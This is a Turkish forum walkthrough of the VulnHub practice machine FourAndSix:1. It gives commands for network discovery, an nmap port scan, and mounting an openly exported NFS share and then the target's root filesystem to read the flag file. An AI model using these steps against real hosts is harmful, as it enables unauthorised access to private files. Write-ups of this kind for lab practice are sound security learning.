FourAndSix: 1 Zafiyetli Makine Çözümü [qwx]

Qwx

Kıdemli Üye
30 Nis 2012
2,728
13
FourAndSix: 1 Zaafiyetli Makine Çözümü


FourAndSix:1 İndirme Linki;


Kod:
[COLOR=silver]https://www.vulnhub.com/entry/fourandsix-1,236/[/COLOR]


Makinemizi açıyoruz bu şekilde bir görüntü geliyor karşımıza.


ilkacilis.jpg





Makinemizi açtık ve her zamanki gibi IP taraması yapıyoruz.
Kod:
[COLOR=Silver]netdiscover[/COLOR]

netdiscover.jpg



IP adresimizi bulduk ve siteye girmeyi deniyoruz.Fakat siteye bağlantı sağlanmıyor.

siteilkacilis.jpg



Hemen vakit kaybetmeden açık port taraması yapıyoruz.Tarattığımız portlarda 2049 portu açık ve NFS yani ağ dosya sistemi buradan dosyalara erişebileceğimiz anlamına gelmektedir.
Kod:
[COLOR=Silver]nmap -sS -sV <adress>[/COLOR]

nmap.jpg



Aşağıda yaptığımız işlemler sırası ile ; Paylaşılan klasorün herkese açık olduğunu görüyoruz ve içindekileri görmek için /tmp dizinine bir klasor açıyoruz.Klasoru oluşturduktan sonra bilgilere erişmek için mount komutunu kullanıyoruz.En son olarakda içindeki çıkan bilgileri ekrana yazdırıyoruz.

Kod:
[COLOR=royalblue][COLOR=Silver]showmount -e <adress>[/COLOR][/COLOR]
[COLOR=Silver]cd /tmp[/COLOR]
 [COLOR=Silver]mkdir <klasoradi>[/COLOR]
 [COLOR=Silver]mount -t nfs <adress>:/shared /tmp/<klasoradi>[/COLOR]
 [COLOR=Silver]cd <klasoradi>[/COLOR]
 [COLOR=Silver]mkdir <klasoradi>[/COLOR]
 [COLOR=Silver]mount USB-stick.img <klasoradi>[/COLOR]
 [COLOR=Silver]cd <klasoradi>[/COLOR]
 [COLOR=Silver]ls -la[/COLOR]

hellolar.jpg



Listeleme yaptıktan sonra bizi 8 tane hello.jpeg/png karışımı dosyalar bizi beklemekte merak edip ilgili dizine gidip görüntüleme yapıyoruz.
Böyle bir şey beklemediğim kesin idi :)
Kök dizinin paylaşıma açık olup olmadığını kontrol edelim.Eğer açık ise oradan birşeyler elde etme şansımız bu duruma bakılırsa çok yüksek.



Kod:
[COLOR=royalblue][COLOR=Silver]mkdir root[/COLOR][/COLOR]
[COLOR=Silver]mount <adress>:/ root[/COLOR]
 [COLOR=Silver]cd root[/COLOR]
 [COLOR=Silver]ls -la[/COLOR]
 [COLOR=Silver]cd root[/COLOR]
 [COLOR=Silver]ls -la[/COLOR]

root.jpg



Görüğümüz üzere proof.txt çıktı karşımıza büyük bir olasılık dahilinde flag karşımıza çıkacaktır.
Kod:
[COLOR=silver]cat proof.txt[/COLOR]

flag.jpg

Ve flag ... Kısa basit hoş daha çok NFS kullanıma yönelik bir CTF olmuş.

 
Son düzenleme:
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.